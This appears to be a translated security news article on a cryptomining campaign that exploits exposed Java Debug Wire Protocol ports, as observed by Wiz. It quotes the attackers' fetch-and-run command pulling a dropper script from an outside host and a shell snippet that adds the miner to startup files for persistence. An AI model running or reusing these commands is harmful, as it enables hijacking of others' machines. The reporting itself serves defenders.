Nova serija kibernetičkih napada usmjerena je na organizacije koje nehotice izlažu Java Debug Wire Protocol (JDWP) servere internetu, a napadači koriste ovu zanemarenu ulaznu tačku za implementaciju sofisticiranog malvera za rudarenje kriptovaluta.
JDWP, kao standardna karakteristika Java platforme, služi za omogućavanje daljinskog otklanjanja grešaka (debugging), dozvoljavajući programerima da pregledaju aktivne aplikacije.
Međutim, kada JDWP ostane dostupan na produkcijskim sistemima, često zbog pogrešne konfiguracije ili upotrebe razvojnih zastavica u aktivnim okruženjima, on postaje snažno sredstvo za daljinsko izvršavanje koda.
Pojava ove prijetnje obilježena je brzim ciklusima eksploatacije. U nekoliko zabilježenih incidenata, napadači su uspjeli kompromitirati ranjive mašine u roku od nekoliko sati od izlaganja.
Tok napada obično započinje masovnim skeniranjem interneta u potrazi za otvorenim JDWP portovima, najčešće portom 5005. Nakon identifikacije mete, napadač inicira JDWP “rukovanje” kako bi potvrdio da je servis aktivan, a zatim uspostavlja sesiju, čime stiče interaktivni pristup Java Virtual Machine (JVM).
Ovaj pristup omogućava napadaču da enumerira učitane klase i poziva metode, što na kraju omogućava izvršavanje proizvoljnih komandi na hostu.
Analitičari Wiz-a su primijetili ovu kampanju nakon što su uočili pokušaje eksploatacije na svojim “honeypot” serverima koji pokreću TeamCity, popularan alat za Continuous Integration/Continuous Deployment (CI/CD).
Napadači su pokazali visok stepen automatizacije i prilagođavanja, implementirajući modifikovani XMRig kriptomineral sa ugrađenom konfiguracijom kako bi izbjegli detekciju.
Značajno je da je korišteni malver koristio proxy servere rudarskih bazena (mining pool proxies) kako bi prikrio adresu novčanika odredišta, što otežava praćenje ili ometanje te ilegalne operacije rudarenja.
Uticaj ovih napada je značajan. Zloupotrebom JDWP-a, akteri prijetnje mogu ne samo implementirati kriptominere, već i uspostaviti duboku perzistenciju (persistence), manipulirati sistemskim procesima i potencijalno se proširiti na druge resurse unutar kompromitovanog okruženja.
Skrivena priroda “payloada”, zajedno sa njegovom sposobnošću da se uklopi u legitimne sistemske uslužne programe, povećava rizik od dugotrajnih, neotkrivenih aktivnosti i iscrpljivanja resursa.
Fokusirajući se na mehanizam infekcije, napadači iskorištavaju nedostatak autentifikacije JDWP-a za ubacivanje i izvršavanje školskih komandi direktno kroz protokol.
Nakon uspostavljanja sesije, oni obično preuzimaju skriptu za “dropper”-a, kao što je logservice.sh, koristeći komande poput:
curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh
bash /tmp/logservice.sh
Ova skripta je dizajnirana da zaustavi konkurentne rudare, preuzme zlonamjerni XMRig binarni fajl prerušen u logrotate i instalira ga u korisnikov direktorijum za konfiguraciju.
Skripta zatim postavlja više mehanizama za perzistenciju, uključujući modifikovanje datoteka za pokretanje školjki (shell startup files), kreiranje cron poslova i instaliranje lažne sistemske usluge.
Naredni izvod ilustruje kako skripta osigurava perzistenciju putem konfiguracije školjke:
add_to_startup() {
if [ -r “$1” ]; then
if ! grep -Fxq “$EXEC >/dev/null 2>&1” “$1”; then
echo “$EXEC >/dev/null 2>&1” >> “$1”
fi
fi
}
Lanac infekcije je efikasan i otporan, omogućavajući kriptominereu da preživi ponovno pokretanje sistema i prijave korisnika.
Upotreba od strane napadača procesnih naziva i sistemskih lokacija koje zvuče legitimno dodatno otežava napore za detekciju i sanaciju, naglašavajući potrebu za budnim upravljanjem konfiguracijom i robusnim praćenjem izloženih servisa.
Istražite ponašanje malvera uživo, pratite svaki korak napada i donosite brže, pametnije sigurnosne odluke.
